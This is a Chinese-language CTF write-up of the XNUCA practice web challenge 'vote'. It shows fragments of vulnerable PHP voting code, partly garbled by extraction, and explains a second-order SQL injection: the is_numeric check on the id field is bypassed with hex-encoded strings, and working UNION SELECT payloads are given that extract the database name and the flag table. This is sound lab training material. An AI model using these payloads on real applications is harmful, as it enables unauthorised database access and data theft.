[XNUCA 进阶靶场vote](web)writeup

更新:

vote

 5 || $vote < 1)
        $vote = 1;
    $q = mysql_query("INSERT INTO t_vote VALUES ({$id}, {$vote}, '{$login}')");
    $q = mysql_query("SELECT id FROM t_vote WHERE user = '{$login}' GROUP BY id");
    echo '
Thank you! Results:
';
    echo '';
    echo '';
    while ($r = mysql_fetch_array($q)) {
        $arr = mysql_fetch_array(mysql_query("SELECT title FROM t_picture WHERE id = ".$r['id']));
        echo '';
        $arr = mysql_fetch_array(mysql_query("SELECT COUNT(value), AVG(value) FROM t_vote WHERE id = ".$r['id']));
        echo '';
    }
    echo '
Logo
Total votes
Average
'.$arr[0].'
'.$arr[0].'
'.round($arr[1],2).'
';
    echo '
goBack
';
    exit;
}
?>


    


Welcome, Movie vote

![](./images/'.$r['image'].')
'.$r['title'].'
';
}
?>

Your vote:

1
2
3
4
5

分析

• 大致看下整体，发现是先insert再然后是查询
• 可控制的参数只有ID
• id的限制是is_numeric($_POST['id'])

解答

id的限制可以使用0x十六进制进行绕过，将我们的注入语句插入进去，存储在数据库中是以字符串的形式

payload如下：

id='-1' union select database()&vote=1&submit=Submit

进行十六进制编码后变成:

id=0x272d312720756e696f6e2073656c6563742064617461626173652829&vote=1&submit=Submit

结果：

image.png

最后得到flag的payload为：
id='-111' union select group_concat(flag) from t_flag&vote=1&submit=Submit
提交：
id=0x272d3131312720756e696f6e2073656c6563742067726f75705f636f6e63617428666c6167292066726f6d20745f666c6167&vote=1&submit=Submit

image.png